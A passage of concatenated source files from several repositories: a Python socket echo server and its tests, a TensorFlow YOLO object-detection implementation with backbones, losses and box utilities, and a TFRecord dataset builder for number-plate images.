        file.write(dicttoxml(data).decode('UTF-8'))
```
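All three printers accept the same input shape: a list of dicts whose keys become Excel column names, JSON keys, or XML element names. A quick usage sketch (import path inferred from the file layout):
```python
# Write the same records to ./output in all three supported formats.
from tsoftlib.helpers.printer import PrintToExcel, PrintToJson, PrintToXML  # path assumed

records = [
    {"name": "Alice", "score": 10},
    {"name": "Bob", "score": 7},
]

PrintToExcel("report", records)  # -> ./output/report.xlsx
PrintToJson("report", records)   # -> ./output/report.json
PrintToXML("report", records)    # -> ./output/report.xml
```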
|
{
"source": "JexusLeon/python_socket_test",
"score": 3
}
|
#### File: py_socket_test/core/server.py
```python
import sys
import types
import socket
import selectors
import logging
logging.basicConfig(
level=logging.DEBUG,
handlers=[logging.FileHandler('server.log', encoding='utf-8')],
datefmt='%d-%m-%Y %H:%M:%S',
format='[%(asctime)s] [%(levelname)s]: %(message)s',
)
class ServerSocket(object):
"""A server that Handling Multiple Connections."""
def __init__(self, host='', port=65400):
self.HOST = host # Symbolic name meaning all available interfaces
self.PORT = port # Arbitrary non-privileged port
self.is_listening = False
self._socket = None
self._logger = logging.getLogger()
self._slt = selectors.DefaultSelector()
def listen(self):
"""Create a new socket using the given address family,
socket type. And registers the socket to be monitored."""
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.bind((self.HOST, self.PORT)) # Bind the socket to address
self._socket.listen(1)
self._socket.setblocking(False) # Configure the socket in non-blocking mode.
self._slt.register(self._socket, selectors.EVENT_READ, data=None)
self.is_listening = True
msg = 'Server Listening on %s:%s' % (self.HOST, self.PORT)
print(msg)
logging.debug(msg)
self._run_daemon()
def close(self):
"""Close connection"""
self._slt.close()
self._socket.close()
self._socket = None
self.is_listening = False
def set_debug(self, debug):
"""Set Debug"""
self._logger.disabled = not debug
def _accept_wrapper(self, sock):
"""Accept Wrapper"""
conn, addr = sock.accept() # Should be ready to read
logging.debug("Accepted Connection From %s:%s" % addr)
conn.setblocking(False)
# We’ll use data to keep track of what’s been sent and received on the socket.
data = types.SimpleNamespace(addr=addr, inb=b"", outb=b"")
events = selectors.EVENT_READ | selectors.EVENT_WRITE
self._slt.register(conn, events, data=data)
def _service_connection(self, key, mask):
"""Read the data sent by the client process it and return it."""
sock = key.fileobj # The socket object
data = key.data
recv_data = None
if mask & selectors.EVENT_READ:
try:
recv_data = sock.recv(1024) # Should be ready to read
except ConnectionResetError:
pass
finally:
if recv_data:
data.outb = recv_data
else:
# This means that the client has closed their socket, so the server should too.
logging.debug("Closing Connection To %s:%s" % data.addr)
self._slt.unregister(sock)
sock.close()
if mask & selectors.EVENT_WRITE:
if data.outb:
response = self.echo(data.outb)
sock.send(response) # Should be ready to write
data.outb = b'' # The bytes sent are then removed from the send buffer:
@staticmethod
def echo(data):
"""Overwrite this method to modify the data."""
return data
def _run_daemon(self):
"""Run Daemon"""
try:
while True:
events = self._slt.select(timeout=None) # Blocks until there are sockets ready for I/O.
for key, mask in events:
if key.data is None:
self._accept_wrapper(key.fileobj)
else:
self._service_connection(key, mask)
except KeyboardInterrupt:
logging.debug("Caught keyboard interrupt, exiting")
finally:
self.close()
if __name__ == '__main__':
if len(sys.argv) != 3:
print("usage:", sys.argv[0], "<host> <port>")
sys.exit(1)
server = ServerSocket(sys.argv[1], int(sys.argv[2]))
server.listen()
```
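The server echoes back whatever `echo` returns for each chunk it reads, so any TCP client can exercise it. A minimal standard-library client sketch against the default host and port (the repository's own `ClientSocket` wraps a similar flow):
```python
# Minimal client for the echo server above, using only the standard library.
import socket

HOST, PORT = "127.0.0.1", 65400  # must match the ServerSocket defaults

with socket.create_connection((HOST, PORT)) as sock:
    sock.sendall(b"hello server")
    reply = sock.recv(1024)
    print("received:", reply)
```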
#### File: py_socket_test/test/test_app.py
```python
import os
import unittest
import threading
from py_socket_test.utils.evaluate import evaluate
from py_socket_test.core.server import ServerSocket
from py_socket_test.core.client import ClientSocket
class SocketConnectionTestCase(unittest.TestCase):
"""Socket Connection TestCase"""
host = '127.0.0.1'
port = 55430
server = ServerSocket(host, port)
client = ClientSocket(host, port)
@classmethod
def setUpClass(cls):
cls.create_server()
@classmethod
def create_server(cls):
"""Create Server"""
def echo(data):
response = str(evaluate(data.decode())).encode()
return response
cls.server.echo = echo
cls.server.set_debug(True)
t = threading.Thread(target=cls.server.listen)
t.daemon = True
t.start()
def test_server(self):
"""Test Server"""
self.assertEqual(self.server.is_listening, True)
def test_client(self):
"""Test Client"""
app_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
file_name = os.path.join(app_path, 'utils', 'operations.txt')
self.client.set_debug(True)
self.client.connect()
self.assertEqual(self.client.is_connected, True)
self.client.send_file(file_name)
self.client.close()
self.assertEqual(self.client.is_connected, False)
def test_evaluate(self):
"""Test Evaluate"""
self.assertEqual(evaluate('74 - 36 - 96 + 32 + 2 + 26'), 2, 'Wrong Evaluation')
self.assertEqual(evaluate('47 - 88 + 32 - 71 * 39 * 68'), -188301, 'Wrong Evaluation')
self.assertEqual(evaluate('49 - 97 + 17 + 31 / 37 + 82'), 51.83783783783784, 'Wrong Evaluation')
self.assertEqual(evaluate('59 + 59 + 3 - 28 / 41 + 84'), 204.3170731707317, 'Wrong Evaluation')
self.assertEqual(evaluate('42 + 23 + 75 - 90'), 50, 'Wrong Evaluation')
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "Jex-y/yolo",
"score": 3
}
|
#### File: Jex-y/yolo/backbones.py
```python
import tensorflow as tf
from .layers import *
# Backbones are the first stage in the YOLO model. They are used to extract features at multiple scales.
class Darknet53(tf.keras.layers.Layer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.layer_stack_1 = [
YOLOConv( (3, 3, 32) ),
YOLOConv( (3, 3, 64), downsample=True ),
]
for i in range(1):
self.layer_stack_1.append( ResidialBlock( 32, 64 ) )
self.layer_stack_1.append(YOLOConv( (3, 3, 128), downsample=True ) )
for i in range(2):
self.layer_stack_1.append( ResidialBlock( 64, 128 ) )
self.layer_stack_1.append(YOLOConv( (3, 3, 256), downsample=True ) )
for i in range(8):
self.layer_stack_1.append( ResidialBlock( 128, 256 ) )
self.layer_stack_2 = [
YOLOConv( (3, 3, 512), downsample=True),
]
for i in range(8):
self.layer_stack_2.append( ResidialBlock( 256, 512 ) )
self.layer_stack_3 = [
YOLOConv((3, 3, 1024), downsample=True),
]
for i in range(4):
self.layer_stack_3.append( ResidialBlock( 512, 1024 ) )
def call(self, x):
for layer in self.layer_stack_1:
x = layer(x)
scale_1 = x
for layer in self.layer_stack_2:
x = layer(x)
scale_2 = x
for layer in self.layer_stack_3:
x = layer(x)
scale_3 = x
return scale_1, scale_2, scale_3
class CSPDarknet53(tf.keras.layers.Layer):
def __init__(self):
super().__init__()
self.layer_stack_1 = [
YOLOConv( (3, 3, 32), activation="mish" ),
            YOLOConv( (3, 3, 64), downsample=True, activation="mish" ),
]
self.layer_stack_2 = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
self.layer_stack_2_skip = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
for i in range(1):
self.layer_stack_2_skip.append( ResidialBlock( 64, 32, 64, activation="mish" ) )
self.layer_stack_2_skip.append( YOLOConv( (1, 1, 64), activation="mish" ) )
self.layer_stack_3 = [
YOLOConv( (1, 1, 64), activation="mish" ),
YOLOConv( (3, 3, 128), downsample=True, activation="mish" ),
]
self.layer_stack_4 = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
for i in range(2):
self.layer_stack_4.append( ResidialBlock( 64, 64, 64, activation="mish") )
self.layer_stack_4.append( YOLOConv( (1, 1, 64), activation="mish" ) )
self.layer_stack_4_skip = [
YOLOConv( (1, 1, 64), activation="mish" ),
]
self.layer_stack_5 = [
YOLOConv( (1, 1, 128), activation="mish" ),
YOLOConv( (3, 3, 256), downsample=True, activation="mish" ),
]
self.layer_stack_6 = [
YOLOConv( (1, 1, 128), activation="mish" ),
]
for i in range(8):
self.layer_stack_6.append( ResidialBlock( 128, 128, 128, activation="mish") )
self.layer_stack_6.append( YOLOConv( (1, 1, 128), activation="mish" ) )
self.layer_stack_6_skip = [
YOLOConv( (1, 1, 128), activation="mish" ),
]
self.layer_stack_7 = [
YOLOConv( (1, 1, 256), activation="mish" ),
]
self.layer_stack_8 = [
YOLOConv( (3, 3, 512), downsample=True, activation="mish" ),
]
self.layer_stack_9 = [
YOLOConv( (1, 1, 256), activation="mish" ),
]
for i in range(8):
self.layer_stack_9.append( ResidialBlock( 256, 256, 256, activation="mish" ) )
self.layer_stack_9.append( YOLOConv( (1, 1, 256), activation="mish" ) )
self.layer_stack_9_skip = [
YOLOConv( (1, 1, 256), activation="mish" ),
]
self.layer_stack_10 = [
YOLOConv( (1, 1, 512), activation = "mish" ),
]
self.layer_stack_11 = [
YOLOConv( (3, 3, 1024), downsample=True, activation="mish" ),
]
self.layer_stack_12 = [
YOLOConv( (1, 1, 512), activation="mish" ),
]
for i in range(4):
self.layer_stack_12.append( ResidialBlock( 512, 512, 512, activation="mish") )
self.layer_stack_12.append( YOLOConv( (1, 1, 512), activation="mish" ) )
self.layer_stack_12_skip = [
YOLOConv( (1, 1, 512), activation="mish" ),
]
self.layer_stack_13 = [
YOLOConv( (1, 1, 1024), activation="mish" ),
YOLOConv( (1, 1, 512) ),
YOLOConv( (3, 3, 1024) ),
YOLOConv( (1, 1, 512) ),
]
self.layer_stack_14 = [
YOLOConv( (1, 1, 512) ),
YOLOConv( (3, 3, 1024) ),
YOLOConv( (1, 1, 512) ),
]
def call(self, x):
for layer in self.layer_stack_1:
x = layer(x)
route = x
for layer in self.layer_stack_2:
route = layer(route)
for layer in self.layer_stack_2_skip:
x = layer(x)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_3:
x = layer(x)
route = x
for layer in self.layer_stack_4:
x = layer(x)
for layer in self.layer_stack_4_skip:
route = layer(route)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_5:
x = layer(x)
route = x
for layer in self.layer_stack_6:
x = layer(x)
for layer in self.layer_stack_6_skip:
route = layer(route)
x = tf.concat([x, route], axis=-1)
for layer in self.layer_stack_7:
x = layer(x)
route_1 = x
for layer in self.layer_stack_8:
x = layer(x)
route = x
for layer in self.layer_stack_9:
x = layer(x)
for layer in self.layer_stack_9_skip:
route = layer(route)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_10:
x = layer(x)
route_2 = x
for layer in self.layer_stack_11:
x = layer(x)
route = x
for layer in self.layer_stack_12:
x = layer(x)
for layer in self.layer_stack_12_skip:
route = layer(route)
x = tf.concat( [x, route], axis=-1 )
for layer in self.layer_stack_13:
x = layer(x)
x = tf.concat( [
tf.nn.max_pool( x, ksize=13, padding='SAME', strides=1 ),
tf.nn.max_pool(x, ksize=9, padding='SAME', strides=1),
tf.nn.max_pool(x, ksize=5, padding='SAME', strides=1),
x
], axis=-1 )
for layer in self.layer_stack_14:
x = layer(x)
return route_1, route_2, x
```
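Both backbones return three feature maps at 1/8, 1/16 and 1/32 of the input resolution, which is what the detector heads consume. A rough shape check, assuming the package imports as `yolo` and that the `YOLOConv`/`ResidialBlock` layers from `.layers` build the way they are used above:
```python
# Sketch: run a dummy image through Darknet53 and inspect the three output scales.
import tensorflow as tf
from yolo.backbones import Darknet53  # package name assumed

backbone = Darknet53()
dummy = tf.zeros((1, 416, 416, 3), dtype=tf.float32)
scale_1, scale_2, scale_3 = backbone(dummy)

# For a standard Darknet53 layer set this should print roughly:
# (1, 52, 52, 256) (1, 26, 26, 512) (1, 13, 13, 1024)
print(scale_1.shape, scale_2.shape, scale_3.shape)
```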
#### File: Jex-y/yolo/detectors.py
```python
import tensorflow as tf
from . import layers
class YoloV3(tf.keras.layers.Layer):
def __init__(self, num_classes, **kwargs):
super().__init__(**kwargs)
self.num_classes = num_classes
self.layer_stack_1 = [
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
]
self.lbbox_layer_stack = [
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 3*(self.num_classes + 5)), activation=None, batchNormalization=False, name="lbbox" ),
]
self.layer_stack_2 = [
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
]
self.mbbox_layer_stack = [
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 3*(self.num_classes + 5)), activation=None, batchNormalization=False, name="mbbox" ),
]
self.sbbox_layer_stack = [
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 512) ),
layers.YOLOConv( (3, 3, 1024) ),
layers.YOLOConv( (1, 1, 3*(self.num_classes + 5)), activation=None, batchNormalization=False, name="sbbox"),
]
    def call(self, scale_1, scale_2, scale_3, training=False):
x = scale_3
for layer in self.layer_stack_1:
x = layer(x)
lbbox_output = x
for layer in self.lbbox_layer_stack:
lbbox_output = layer(lbbox_output)
x = layers.Upsample()(x)
x = tf.concat( [scale_2, x], axis=-1 )
for layer in self.layer_stack_2:
x = layer(x)
mbbox_output = x
for layer in self.mbbox_layer_stack:
mbbox_output = layer(mbbox_output)
x = layers.Upsample()(x)
sbbox_output = tf.concat( [scale_1, x], axis=-1 )
for layer in self.sbbox_layer_stack:
sbbox_output = layer(sbbox_output)
return sbbox_output, mbbox_output, lbbox_output
```
#### File: Jex-y/yolo/losses.py
```python
import tensorflow as tf
from . import utils
import numpy as np
# strides = self.strides[scale]
# num_classes = self.num_classes
# iou_loss_threshold = self.iou_loss_threshold
# @tf.function
def yolo_loss(pred, conv, label, bboxes, input_size, iou_loss_threshold):
conv_raw_conf = conv[:, :, :, :, 4:5]
conv_raw_prob = conv[:, :, :, :, 5:]
pred_xywh = pred[:, :, :, :, 0:4]
pred_conf = pred[:, :, :, :, 4:5]
label_xywh = label[:, :, :, :, 0:4]
respond_bbox = label[:, :, :, :, 4:5]
label_prob = label[:, :, :, :, 5:]
giou = tf.expand_dims(utils.bbox_giou(pred_xywh, label_xywh), axis=-1)
input_size = tf.cast(input_size, tf.float32)
bbox_loss_scale = 2.0 - 1.0 * label_xywh[:, :, :, :, 2:3] * label_xywh[:, :, :, :, 3:4] / (input_size ** 2)
giou_loss = respond_bbox * bbox_loss_scale * (1- giou)
iou = utils.bbox_iou(pred_xywh[:, :, :, :, np.newaxis, :], bboxes[:, np.newaxis, np.newaxis, np.newaxis, :, :])
max_iou = tf.expand_dims(tf.reduce_max(iou, axis=-1), axis=-1)
respond_bgd = (1.0 - respond_bbox) * tf.cast( max_iou < iou_loss_threshold, tf.float32 )
conf_focal = tf.pow(respond_bbox - pred_conf, 2)
conf_loss = conf_focal * (
respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
+
respond_bgd * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
)
prob_loss = respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=label_prob, logits=conv_raw_prob)
giou_loss = tf.reduce_mean(tf.reduce_sum(giou_loss, axis=[1,2,3,4]))
conf_loss = tf.reduce_mean(tf.reduce_sum(conf_loss, axis=[1,2,3,4]))
prob_loss = tf.reduce_mean(tf.reduce_sum(prob_loss, axis=[1,2,3,4]))
return giou_loss, conf_loss, prob_loss
def get_yolo_loss_at_scales(scales, num_classes, strides, iou_loss_threshold, xyscale, anchors):
losses = []
for scale in scales[::-1]:
@tf.function
def loss(target, output):
output_shape = tf.shape(output)
batch_size = output_shape[0]
output_size = output_shape[1]
input_size = output_size * strides[scale]
output_shape = (batch_size, output_size, output_size, 3, 5+num_classes)
target_split = np.prod(output_shape[1:])
output = tf.reshape(output, output_shape)
labels = tf.reshape(target[:,:target_split], output_shape)
bboxes = tf.reshape(target[:,target_split:], (batch_size, 128, 4))
decoded = utils.decode_train(output, scale, output_size, num_classes, strides, xyscale, anchors)
giou_loss, conf_loss, prob_loss = yolo_loss(decoded, output, labels, bboxes, input_size, iou_loss_threshold)
return giou_loss + conf_loss + prob_loss
losses.append(loss)
return losses
```
#### File: Jex-y/yolo/utils.py
```python
import numpy as np
import cv2
import tensorflow as tf
def image_preprocess(image, bboxes, train_input_size):
"""Rescales images to the correct size whilst also adjusting the bounding boxes accordingly.
Args:
image (np.ndarray): The image to be resized.
bboxes (np.ndarray): The bounding boxes related to the image.
Returns:
np.ndarray: The adjusted image.
np.ndarray: The adjusted bboxes.
"""
target_height = target_width = train_input_size
height, width, _ = image.shape
scale = min(target_width/width, target_height/height)
new_height, new_width = int(scale * height), int(scale * width)
    image_resized = cv2.resize(image, (new_width, new_height))
    image_paded = np.full(shape=[target_height, target_width, 3], fill_value=128.0)
    pad_height, pad_width = (target_height-new_height) // 2, (target_width - new_width) // 2
    image_paded[pad_height:new_height+pad_height, pad_width:new_width+pad_width, :] = image_resized
image_paded = image_paded / 256.
# 256 used as it is an exact power of 2 so only the exponent is changed, useful for storing in half precision
bboxes[:, [0, 2]] = bboxes[:, [0, 2]] * scale + pad_width
bboxes[:, [1, 3]] = bboxes[:, [1, 3]] * scale + pad_height
return image_paded, bboxes
@tf.function
def bbox_iou(bboxes1, bboxes2):
bboxes1_area = bboxes1[..., 2] * bboxes1[..., 3]
bboxes2_area = bboxes2[..., 2] * bboxes2[..., 3]
bboxes1_coor = tf.concat(
[
bboxes1[..., :2] - bboxes1[..., 2:] * 0.5,
bboxes1[..., :2] + bboxes1[..., 2:] * 0.5,
],
axis=-1,
)
bboxes2_coor = tf.concat(
[
bboxes2[..., :2] - bboxes2[..., 2:] * 0.5,
bboxes2[..., :2] + bboxes2[..., 2:] * 0.5,
],
axis=-1,
)
left_up = tf.maximum(bboxes1_coor[..., :2], bboxes2_coor[..., :2])
right_down = tf.minimum(bboxes1_coor[..., 2:], bboxes2_coor[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = bboxes1_area + bboxes2_area - inter_area
iou = tf.math.divide_no_nan(inter_area, union_area)
return iou
@tf.function
def bbox_giou(bboxes1, bboxes2):
bboxes1_area = bboxes1[..., 2] * bboxes1[..., 3]
bboxes2_area = bboxes2[..., 2] * bboxes2[..., 3]
bboxes1_coor = tf.concat(
[
bboxes1[..., :2] - bboxes1[..., 2:] * 0.5,
bboxes1[..., :2] + bboxes1[..., 2:] * 0.5,
],
axis=-1,
)
bboxes2_coor = tf.concat(
[
bboxes2[..., :2] - bboxes2[..., 2:] * 0.5,
bboxes2[..., :2] + bboxes2[..., 2:] * 0.5,
],
axis=-1,
)
left_up = tf.maximum(bboxes1_coor[..., :2], bboxes2_coor[..., :2])
right_down = tf.minimum(bboxes1_coor[..., 2:], bboxes2_coor[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = bboxes1_area + bboxes2_area - inter_area
iou = tf.math.divide_no_nan(inter_area, union_area)
enclose_left_up = tf.minimum(bboxes1_coor[..., :2], bboxes2_coor[..., :2])
enclose_right_down = tf.maximum(
bboxes1_coor[..., 2:], bboxes2_coor[..., 2:]
)
enclose_section = enclose_right_down - enclose_left_up
enclose_area = enclose_section[..., 0] * enclose_section[..., 1]
giou = iou - tf.math.divide_no_nan(enclose_area - union_area, enclose_area)
return giou
@tf.function
def decode(conv_output, scale, output_size, num_classes, strides, xyscale, anchors):
conv_raw_dxdy, conv_raw_dwdh, conv_raw_conf, conv_raw_prob = tf.split(conv_output, (2, 2, 1, num_classes),
axis=-1)
xy_grid = tf.meshgrid(tf.range(output_size), tf.range(output_size))
xy_grid = tf.expand_dims(tf.stack(xy_grid, axis=-1), axis=2) # [gx, gy, 1, 2]
xy_grid = tf.tile(tf.expand_dims(xy_grid, axis=0), [tf.shape(conv_output)[0], 1, 1, 3, 1])
xy_grid = tf.cast(xy_grid, tf.float32)
pred_xy = ((tf.sigmoid(conv_raw_dxdy) * xyscale[scale]) - 0.5 * (xyscale[scale] - 1) + xy_grid) * \
strides[scale]
pred_wh = (tf.exp(conv_raw_dwdh) * anchors[scale])
pred_xywh = tf.concat([pred_xy, pred_wh], axis=-1)
pred_conf = tf.sigmoid(conv_raw_conf)
pred_prob = tf.sigmoid(conv_raw_prob)
return pred_xywh, pred_conf, pred_prob
@tf.function
def decode_train(conv_output, scale, output_size, num_classes, strides, xyscale, anchors):
pred_xywh, pred_conf, pred_prob = decode(conv_output, scale, output_size, num_classes, strides, xyscale, anchors)
return tf.concat([pred_xywh, pred_conf, pred_prob], axis=-1)
@tf.function
def decode_predict(conv_output, scale, output_size, num_classes, strides, xyscale, anchors):
pred_xywh, pred_conf, pred_prob = decode(conv_output, scale, output_size, num_classes, strides, xyscale, anchors)
batch_size = tf.shape(conv_output)[0]
pred_prob = pred_conf * pred_prob
pred_prob = tf.reshape(pred_prob, (batch_size, -1, num_classes))
pred_xywh = tf.reshape(pred_xywh, (batch_size, -1, 4))
return pred_xywh, pred_prob
@tf.function
def filter_bboxes(bboxes, scores, score_threshold, image_size):
scores_max = tf.math.reduce_max(scores, axis=-1)
mask = scores_max >= score_threshold
class_boxes = tf.boolean_mask(bboxes, mask)
pred_conf = tf.boolean_mask(scores, mask)
class_boxes = tf.reshape(class_boxes, [tf.shape(scores)[0], -1, tf.shape(class_boxes)[-1]])
pred_conf = tf.reshape(pred_conf, [tf.shape(scores)[0], -1, tf.shape(pred_conf)[-1]])
box_xy, box_wh = tf.split(class_boxes, (2, 2), axis=-1)
# image_size = tf.cast(image_size, dtype=tf.float32)
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
box_mins = (box_yx - (box_hw / 2.)) / image_size
box_maxes = (box_yx + (box_hw / 2.)) / image_size
boxes = tf.concat([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
], axis=-1)
return boxes, pred_conf
@tf.function
def bbox_nms(model_output, image_size, max_outputs_per_class=32, max_outputs=32, iou_threshold=0.45, score_threshold=0.25):
pred_bboxes, pred_prob = [],[]
for i in range(3):
output_shape = tf.shape(model_output[i])
conv_output = tf.reshape(model_output[i], (output_shape[0], output_shape[1], output_shape[2], 3, output_shape[3]//3))
bbox, prob = decode_predict(conv_output, i, output_shape[1], 1, [8, 16, 32], [1.2, 1.1, 1.05], [
1.25, 1.625, 2.0, 3.75,
4.125, 2.875, 1.875, 3.8125,
3.875, 2.8125, 3.6875, 7.4375,
3.625, 2.8125, 4.875, 6.1875,
11.65625, 10.1875])
pred_bboxes.append(bbox)
pred_prob.append(prob)
boxes, conf = filter_bboxes(
tf.concat(pred_bboxes, axis=1),
tf.concat(pred_prob, axis=1),
score_threshold,
image_size
)
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),
scores=tf.reshape(
conf, (tf.shape(conf)[0], -1, tf.shape(conf)[-1])),
max_output_size_per_class=max_outputs_per_class,
max_total_size=max_outputs,
iou_threshold=iou_threshold,
score_threshold=score_threshold
)
return boxes, scores, classes, valid_detections
def draw_bbox(images, model_output, image_size, num_classes, classes=None, show_label=True):
import colorsys
output_images = []
all_boxes, all_scores, all_classes, all_num_boxes = bbox_nms(
model_output,
image_size
)
if not classes:
classes = [str(i) for i in range(num_classes)]
height, width, _ = images[0].shape
hsv_tuples = [(1.0 * x / num_classes, 1., 1.) for x in range(num_classes)]
colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
colors = list(map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)), colors))
    for image, boxes, scores, class_ids, num_boxes in zip(images, all_boxes, all_scores, all_classes, all_num_boxes):
        for j in range(int(num_boxes)):
            class_ind = int(class_ids[j])
            if class_ind < 0 or class_ind >= num_classes: continue
            coor = np.array(boxes[j], dtype=np.float32)
            coor[0] = int(coor[0] * height)
            coor[2] = int(coor[2] * height)
            coor[1] = int(coor[1] * width)
            coor[3] = int(coor[3] * width)
            coor = coor.astype(np.int32)
            fontScale = 0.5
            score = float(scores[j])
            bbox_color = colors[class_ind]
            bbox_thick = int(0.6 * (height + width) / 600)
            c1, c2 = (int(coor[1]), int(coor[0])), (int(coor[3]), int(coor[2]))
            cv2.rectangle(image, c1, c2, bbox_color, bbox_thick)
            if show_label:
                bbox_mess = '%s: %.2f' % (classes[class_ind], score)
                t_size = cv2.getTextSize(bbox_mess, 0, fontScale, thickness=bbox_thick // 2)[0]
                c3 = (c1[0] + t_size[0], c1[1] - t_size[1] - 3)
                cv2.rectangle(image, c1, (int(c3[0]), int(c3[1])), bbox_color, -1)  # filled
                cv2.putText(image, bbox_mess, (c1[0], int(c1[1] - 2)), cv2.FONT_HERSHEY_SIMPLEX,
                            fontScale, (0, 0, 0), bbox_thick // 2, lineType=cv2.LINE_AA)
        output_images.append(image)
return output_images
```
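The IoU/GIoU helpers expect boxes as (center-x, center-y, width, height), the same layout `decode` produces. A tiny self-contained check on hand-picked boxes (the `yolo` package name is assumed):
```python
# Toy check of the IoU/GIoU helpers: boxes are (cx, cy, w, h).
import tensorflow as tf
from yolo.utils import bbox_iou, bbox_giou  # package name assumed

a = tf.constant([[5.0, 5.0, 4.0, 4.0]])   # box centred at (5, 5), 4x4
b = tf.constant([[7.0, 5.0, 4.0, 4.0]])   # same size, shifted 2 to the right

# Overlap is 2x4 = 8, union is 16 + 16 - 8 = 24 -> IoU = 1/3
print(bbox_iou(a, b).numpy())   # ~[0.3333]
# Enclosing box is 6x4 = 24 == union, so GIoU equals IoU here
print(bbox_giou(a, b).numpy())  # ~[0.3333]
```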
|
{
"source": "Jex-y/yolov3-tf2",
"score": 2
}
|
#### File: Jex-y/yolov3-tf2/build_dataset.py
```python
import tensorflow as tf
import numpy as np
import os
import io
import hashlib
from PIL import Image
from absl import app, flags, logging
from absl.flags import FLAGS
flags.DEFINE_string("output_path", "data/{}.tfrecord", "Save path for dataset")
flags.DEFINE_string("data_path","raw_data","Path to raw dataset")
flags.DEFINE_float("val_split",0.2,"Split of data to be validated")
flags.DEFINE_integer("seed",0,"Random seed to pick training and validation data")
flags.DEFINE_boolean("verbose",1,"Verbositiy of the output")
def main(_argv):
build(FLAGS.output_path,data_path=FLAGS.data_path,val_split=FLAGS.val_split,seed=FLAGS.seed)
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _bytes_list_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _float_list_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _int64_list_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def make_example(file,data_path):
    with open(os.path.join(data_path, file), "r") as f:
data = f.read().split("\n")
xmin, xmax, ymin, ymax, text, label, diff, trunc, view = [], [], [], [], [], [], [], [], []
size = None
for meta in data:
if meta != "":
meta = meta.split("\t")
image_path = meta[0]
            if size is None:
                image_path = os.path.abspath(os.path.join(data_path, image_path))
with tf.io.gfile.GFile(image_path,"rb") as fid:
encoded_jpg = fid.read()
key = hashlib.sha256(encoded_jpg).hexdigest()
encoded_jpg_io = io.BytesIO(encoded_jpg)
img = Image.open(encoded_jpg_io)
                width, height = img.size
                size = (width, height)
                img.close()
bbox = [float(meta[i]) for i in range(1,5)]
xmin.append(bbox[0] / width)
xmax.append((bbox[0] + bbox[2]) / width)
ymin.append(bbox[1] / height)
ymax.append((bbox[1] + bbox[3]) / height)
text.append("Number Plate".encode("utf8"))
label.append(0)
            diff.append(False)  # Is the object difficult to recognise, e.g. hidden or obstructed
            trunc.append(False)  # Is the object only partially visible, e.g. a person from the waist up
            view.append("back".encode("utf8"))  # View of the object, e.g. behind or in front
plate = meta[5]
tf_example = tf.train.Example(features=tf.train.Features(feature={
"image/height" : _int64_feature(height),
"image/width" : _int64_feature(width),
"image/filename" : _bytes_feature(image_path.encode("utf8")),
"image/source_id" : _bytes_feature(image_path.encode("utf8")),
"image/key/sha256" : _bytes_feature(key.encode("utf8")),
"image/encoded" : _bytes_feature(encoded_jpg),
"image/format" : _bytes_feature("jpg".encode("utf8")),
"image/object/bbox/xmin" : _float_list_feature(xmin),
"image/object/bbox/xmax" : _float_list_feature(xmax),
"image/object/bbox/ymin" : _float_list_feature(ymin),
"image/object/bbox/ymax" : _float_list_feature(ymax),
"image/object/class/text" : _bytes_list_feature(text),
"image/object/class/label" : _int64_list_feature(label),
"image/object/difficult" : _int64_list_feature(diff),
"image/object/truncated" : _int64_list_feature(trunc),
"image/object/view" : _bytes_list_feature(view)
}))
return tf_example
def build(output_path,data_path,val_split,seed):
np.random.seed(seed)
files = [ x for x in os.listdir(data_path) if x.split(".")[-1] == "txt"]
val = np.random.rand(len(files))
indexes_all = [np.nonzero(val>=val_split)[0],np.nonzero(val<val_split)[0]]
print("Number of train samples: {}\nNumber of validation samples {}\n".format(indexes_all[0].shape[0],indexes_all[1].shape[0]))
count = 0
size = 50
for indexes in indexes_all:
num = indexes.shape[0]
done = 0
writer = tf.io.TFRecordWriter(output_path.format("train" if count == 0 else "val"))
for index in indexes:
tf_example = make_example(files[index],data_path=data_path)
writer.write(tf_example.SerializeToString())
done += 1
ratio = done/num
if FLAGS.verbose > 0:
